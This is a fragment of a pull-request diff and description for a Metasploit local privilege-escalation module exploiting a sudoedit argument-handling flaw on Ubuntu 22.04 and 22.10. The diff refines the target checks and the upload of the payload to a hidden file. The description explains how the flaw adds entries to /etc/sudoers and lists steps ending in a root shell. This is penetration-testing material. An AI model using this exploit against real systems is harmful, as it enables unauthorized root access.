     editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E "(root)" | rev | cut -d " " -f 1 | rev')
     editable_file = editable_file.strip
-    if editable_file.include?('a terminal is required to read the password') || editable_file.nil? || editable_file.empty?
+    if editable_file.nil? || editable_file.empty? || editable_file.include?('a terminal is required to read the password') || editable_file.include?('password for')
       return nil
     end
+
+    return nil unless file?(editable_file)
 
     editable_file
   end
@@ -163,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Local
       elsif exploitable
         return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")
       else
-        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploitabed by this module")
+        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploited by this module")
       end
     end
 
@@ -181,9 +187,15 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # Make sure we can write our exploit and payload to the local system
-    unless writable? base_dir
+    unless writable?(base_dir) && directory?(base_dir)
       fail_with Failure::BadConfig, "#{base_dir} is not writable"
     end
+
+    sys_info = get_sysinfo
+
+    # Check the app is installed and the version
+    fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:distro] == 'ubuntu'
+    fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:version].include?('22.04') || sys_info[:version].include?('22.10')
 
     # Upload payload executable
     payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"


### PR DESCRIPTION
This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.
The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided
environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to
append arbitrary entries to the list of files to process. This can lead to privilege escalation.
by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root
privileges.

Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu
22.04 and 22.10.

This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and
1.9.11p3-1ubuntu1 on Ubuntu 22.10.

## Verification


- [ ] Install the application
- [ ] Start `msfconsole`
- [ ] Get an initial shell
- [ ] Do: `use exploit/linux/local/sudoedit_bypass_priv_esc`
- [ ] Do: `set session [session]`
- [ ] Do: `run`
- [ ] You should get a root shell.
